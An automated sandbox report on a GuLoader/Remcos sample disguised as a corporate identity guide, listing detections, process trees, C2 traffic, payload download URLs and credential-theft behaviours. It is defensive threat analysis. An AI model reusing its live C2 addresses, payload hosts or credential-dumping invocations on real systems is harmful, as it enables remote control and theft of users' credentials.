Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHRI_kurumsal_kimlik_rehberi-2023.exe

Overview

General Information

Sample Name:DHRI_kurumsal_kimlik_rehberi-2023.exe
Analysis ID:1333307
MD5:f6cbf303899397b7d28e19930d48627d
SHA1:c3b2d0902bc0724228519030d341294db265f379
SHA256:2eb8015d95b1f69eca4acc3d64c0ed58125431a19df865a493990025ebe5b40a
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to steal Mail credentials (via file registry)
Contains functionality to modify clipboard data
Yara detected WebBrowserPassView password recovery tool
Uses dynamic DNS services
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • DHRI_kurumsal_kimlik_rehberi-2023.exe (PID: 8680 cmdline: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe MD5: F6CBF303899397B7D28E19930D48627D)
    • wab.exe (PID: 8800 cmdline: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 9188 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\edvlu MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 9196 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\pxbdutmxl MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 1820 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rrgwvlxrzapp MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • backgroundTaskHost.exe (PID: 9188 cmdline: "C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca MD5: DA7063B17DBB8BBB3015351016868006)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\paqlgkfs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1125447769.00000000005BF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
      00000001.00000003.1382395875.0000000000B24000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000001.00000002.5950608330.0000000000B24000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000000.00000002.1126111595.000000000555D000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: DHRI_kurumsal_kimlik_rehberi-2023.exe PID: 8680JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
              Click to see the 3 entries
              No Sigma rule has matched
              Timestamp:192.168.11.20217.147.225.6949745802855192 10/27/23-16:20:25.826419
              SID:2855192
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.11.2094.156.6.2534974624022032776 10/27/23-16:20:30.134330
              SID:2032776
              Source Port:49746
              Destination Port:2402
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:94.156.6.253192.168.11.202402497462032777 10/27/23-16:26:57.279387
              SID:2032777
              Source Port:2402
              Destination Port:49746
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: DHRI_kurumsal_kimlik_rehberi-2023.exeVirustotal: Detection: 38%Perma Link
              Source: DHRI_kurumsal_kimlik_rehberi-2023.exeReversingLabs: Detection: 26%
              Source: Yara matchFile source: 00000001.00000003.1382395875.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.5950608330.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8800, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Source: DHRI_kurumsal_kimlik_rehberi-2023.exeAvira: detected
              Source: ourt2949aslumes9.duckdns.orgVirustotal: Detection: 13%Perma Link
              Source: C:\Users\user\AppData\Local\Temp\Atriocoelomic\Retarded.exeAvira: detection malicious, Label: HEUR/AGEN.1338455
              Source: C:\Users\user\AppData\Local\Temp\Atriocoelomic\Retarded.exeReversingLabs: Detection: 26%
              Source: C:\Users\user\AppData\Local\Temp\Atriocoelomic\Retarded.exeVirustotal: Detection: 38%Perma Link
              Source: DHRI_kurumsal_kimlik_rehberi-2023.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: DHRI_kurumsal_kimlik_rehberi-2023.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059CC
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 1_2_371C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_371C10F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 1_2_371C6580 FindFirstFileExA,1_2_371C6580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,4_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407C87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407898

              Networking

              barindex
              Source: TrafficSnort IDS: 2855192 ETPRO TROJAN GuLoader Encoded Binary Request M2 192.168.11.20:49745 -> 217.147.225.69:80
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.11.20:49746 -> 94.156.6.253:2402
              Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 94.156.6.253:2402 -> 192.168.11.20:49746
              Source: unknownDNS query: name: ourt2949aslumes9.duckdns.org
              Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
              Source: Joe Sandbox ViewASN Name: GRENA-ASTbilisiGeorgiaGE GRENA-ASTbilisiGeorgiaGE
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 94.156.6.253 94.156.6.253
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: global trafficHTTP traffic detected: GET /IogvoayYhe139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: gudanidevelopment.geCache-Control: no-cache
              Source: global trafficTCP traffic: 192.168.11.20:49746 -> 94.156.6.253:2402
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: wab.exe, 00000001.00000002.5979330195.0000000037190000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.1158713515.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, 00000004.00000003.1189832373.0000000004800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_o
              Source: wab.exe, 00000004.00000003.1189832373.0000000004800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_o
              Source: wab.exe, wab.exe, 00000006.00000002.1158713515.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000004.00000003.1193890837.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1193835218.00000000047EC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1196417414.00000000047F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginM equals www.facebook.com (Facebook)
              Source: wab.exe, 00000004.00000003.1193890837.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1193835218.00000000047EC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1196417414.00000000047F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginM equals www.yahoo.com (Yahoo)
              Source: wab.exe, 00000004.00000002.1196709713.0000000004FE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: n":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}}fre{"autoimport_spartan_visible_item_completed":true,"oem_bookma equals www.facebook.com (Facebook)
              Source: wab.exe, 00000004.00000003.1190030376.00000000047F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: u"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}}fre{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"}hardware_acceleration_mode_previoustrueis_dsp_recommendedtruelegacy{"profile":{"name":{"migrated":true}}}migration{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false}network_primary_browser{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}}network_time{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}}os_crypt{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="}policy{"last_statistics_update":"13335737596278882"}profileANg3Zw2QouYXcOw3P8MgEYmqBohsyHX3A0QYKqCpqgaYKnCaImmJqgaoKr2eaJ8Qu6JvhC8IXgC8EXskfsUsie4Rd8IfhC8IXgC8EXgi8EXwi+EHxhm5eAX/CF4Gudt8rtxcmWHtzKEYrlqfPwGMw8n+fDLltVh7rgekAiRnsBdgY/P4Itiocfnljxe+W2ga1bwbr1j/CS/34+f3++b1IqgQeX2IdvZPSDce7EDIYgeJVNpXPeTKuHZ5yVD9wJ0DceUugUaQm3qtju0YTnB5MKDsADH+gwWG2vonWTUqaj9QFb2Dy/bF7sY6I1n2DJHmpa7A/qg4yb4S6NqPJ9AtKm/5KR8b3rp9+LtsdJcYYVbLtPZTteneEulyXk/54QMpAYEW3NtmiWweguM1wR+XqhTdqDDDBykftettEI9cW4grTMwqcc equals www.facebook.com (Facebook)
              Source: wab.exe, 00000004.00000003.1189969126.0000000004806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}}fre{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"}hardware_acceleration_mode_previoustrueis_dsp_recommendedtruelegacy{"profile":{"name":{"migrated":true}}}migration{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false}network_primary_browser{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}}network_time{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}}os_crypt{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="}policy{"last_statistics_update":"13335737596278882"}profile{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20","background_apps":false,"edge_account_cid":"8628dc546dc99469","edge_account_first_name":"Shahak","edge_account_last_name":"Shapira","edge_account_oid":"","edge_account_sovereignty":0,"edge_account_tenant_id":"","edge_account_type":1,"edge_force_signout_state":0,"edge_kids_mode":false,"edge_muid":"243215E5327669D43677068133B66811","edge_previously_signin_user_name":"","edge_signed_in_default_name":33554433,"edge_test_on_premises":false,"edge_wam_aad_for_app_account_type":0,"edge_was_previously_signin":false,"force_signin_profile_locked":false,"gaia_given_name":"","gaia_id
              Source: wab.exe, 00000001.00000002.5979154797.0000000037100000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000001.00000002.5979154797.0000000037100000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
